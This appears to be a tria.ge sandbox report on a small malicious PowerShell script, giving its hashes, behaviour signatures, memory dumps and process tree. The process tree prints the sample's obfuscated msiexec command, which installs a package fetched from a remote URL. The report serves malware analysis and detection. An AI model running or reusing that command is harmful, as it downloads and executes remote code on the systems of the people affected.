Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

1

mal.ps1

windows7-x64

8

mal.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    29s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    20/04/2023, 13:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    mal.ps1

  • Size

    181B

  • MD5

    3721fd648f3c3beaeb254f4b0634e3eb

  • SHA1

    dfcfcb9bb2aa8eeb2f161de8a87dfab9c8c50661

  • SHA256

    e35b56d5f5d582028fb928ede2d82386954a2d21eb00b3209b47e2ff32817762

  • SHA512

    d9b7fb79158946131854912b4810770acf66f9b13c536152353edd1cb3c98288c251dd98e6dea0b8ad916c6900591d7f2e24c585f5bbf575b83e18b8ebc055c1

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Unknown use of msiexec with remote resource 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\mal.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1484
    • C:\Windows\system32\msiexec.exe
      "C:\Windows\system32\msiexec.exe" iCk=fY nJTVIAFbu=wsUIOgdO MGGpi=klLubBElx /I HTtp://Zxn.FYi:8080/AY/y6z4ru6PiSU/EzJ6YyZvtXTpANwTR/NICHQ-LTG2-052?okean wjR=KGIwmJf -QN rJqlWJ=jqNwQH izJnS=bvioV rMAai=AfWR
      2⤵
      • Unknown use of msiexec with remote resource
      • Suspicious use of AdjustPrivilegeToken
      PID:268
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:1684

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1484-58-0x000000001B180000-0x000000001B462000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1484-59-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1484-61-0x00000000022E0000-0x00000000022E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1484-60-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1484-62-0x000000000268B000-0x00000000026C2000-memory.dmp

    Filesize

    220KB

    Download